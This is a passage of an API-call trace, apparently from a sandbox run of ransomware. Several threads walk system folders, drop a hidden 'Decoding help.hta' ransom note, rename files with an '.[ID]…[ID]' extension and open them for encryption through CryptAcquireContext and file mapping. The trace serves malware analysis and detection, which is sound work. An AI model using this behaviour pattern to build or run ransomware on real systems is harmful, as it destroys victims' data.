ftLastWriteTime.dwLowDateTime=0x7bef7178, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="WORKFL~1.TAR")) returned 1 [0048.851] lstrcpyW (in: lpString1=0x11163bb8, lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" [0048.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned 75 [0048.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta" [0048.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\decoding help.hta")) returned 0xffffffff [0048.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0050.387] WriteFile (in: hFile=0x2f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x17ddfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x17ddfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.545] CloseHandle (hObject=0x2f0) returned 1 [0053.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.627] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Workflow.Targets") returned -1 [0057.627] lstrlenW (lpString="Workflow.Targets") returned 16 [0057.628] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*" [0057.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*") returned 75 [0057.628] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", lpString2="Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" [0057.628] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" [0057.628] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" [0057.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets"), lpNewFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.targets.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0061.599] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3a4 [0061.599] CryptAcquireContextA (phProv=0x17ddfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 625 os_tid = 0xe08 [0048.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ef0 [0048.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.853] FindNextFileW (in: hFindFile=0x671ef0, lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.853] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.853] FindNextFileW (in: hFindFile=0x671ef0, lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0048.853] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_amd64") returned -1 [0048.853] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_amd64") returned -1 [0048.854] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_amd64") returned 1 [0048.854] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" [0048.854] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned 99 [0048.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0048.854] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0048.854] GlobalMemoryStatus (in: lpBuffer=0x17edfd10 | out: lpBuffer=0x17edfd10) [0048.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95b1bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.857] CloseHandle (hObject=0x5a4) returned 1 [0048.857] FindNextFileW (in: hFindFile=0x671ef0, lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0048.857] FindClose (in: hFindFile=0x671ef0 | out: hFindFile=0x671ef0) returned 1 Thread: id = 626 os_tid = 0xe0c [0048.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*", lpFindFileData=0x17fdfd30 | out: lpFindFileData=0x17fdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8850 [0049.294] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.294] FindNextFileW (in: hFindFile=0x5d8850, lpFindFileData=0x17fdfd30 | out: lpFindFileData=0x17fdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.294] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.294] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.294] FindNextFileW (in: hFindFile=0x5d8850, lpFindFileData=0x17fdfd30 | out: lpFindFileData=0x17fdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56230575, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x56230575, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x562566d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="")) returned 1 [0049.643] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0049.644] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 75 [0049.644] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" [0049.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\decoding help.hta")) returned 0xffffffff [0049.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x628 [0050.377] WriteFile (in: hFile=0x628, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x17fdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x17fdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.671] CloseHandle (hObject=0x628) returned 1 [0052.160] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.727] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Workflow.Targets") returned -1 [0056.727] lstrlenW (lpString="Workflow.Targets") returned 16 [0056.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0056.727] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 75 [0056.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" [0056.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" [0056.728] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" [0056.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), lpNewFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.728] FindNextFileW (in: hFindFile=0x5d8850, lpFindFileData=0x17fdfd30 | out: lpFindFileData=0x17fdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9fc12, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x8c9fc12, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5627c831, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="")) returned 1 [0056.728] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0056.728] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 75 [0056.728] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" [0056.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\decoding help.hta")) returned 0x1 [0056.729] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Workflow.VisualBasic.Targets") returned -1 [0056.729] lstrlenW (lpString="Workflow.VisualBasic.Targets") returned 28 [0056.729] lstrcmpiW (lpString1="[ID]", lpString2="gets") returned -1 [0056.729] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*" [0056.729] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\*.*") returned 75 [0056.729] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\", lpString2="Workflow.VisualBasic.Targets" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" [0056.729] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" [0056.729] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets.[ID]g9uZrLhJaygpwRm1[ID]" [0056.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets"), lpNewFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.729] FindNextFileW (in: hFindFile=0x5d8850, lpFindFileData=0x17fdfd30 | out: lpFindFileData=0x17fdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c9fc12, ftCreationTime.dwHighDateTime=0x1ca03fc, ftLastAccessTime.dwLowDateTime=0x8c9fc12, ftLastAccessTime.dwHighDateTime=0x1ca03fc, ftLastWriteTime.dwLowDateTime=0x5627c831, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.VisualBasic.Targets", cAlternateFileName="")) returned 0 [0056.729] FindClose (in: hFindFile=0x5d8850 | out: hFindFile=0x5d8850) returned 1 Thread: id = 627 os_tid = 0xe10 [0048.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*", lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7cd0 [0049.866] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.866] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.866] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.866] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.866] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0049.866] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_amd64") returned -1 [0049.866] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_amd64") returned -1 [0049.866] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_amd64") returned 1 [0050.226] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" [0050.226] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned 100 [0050.226] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64" [0050.226] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0050.226] GlobalMemoryStatus (in: lpBuffer=0x180dfd10 | out: lpBuffer=0x180dfd10) [0050.226] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x250ff850, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0050.227] CloseHandle (hObject=0x628) returned 1 [0050.227] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, 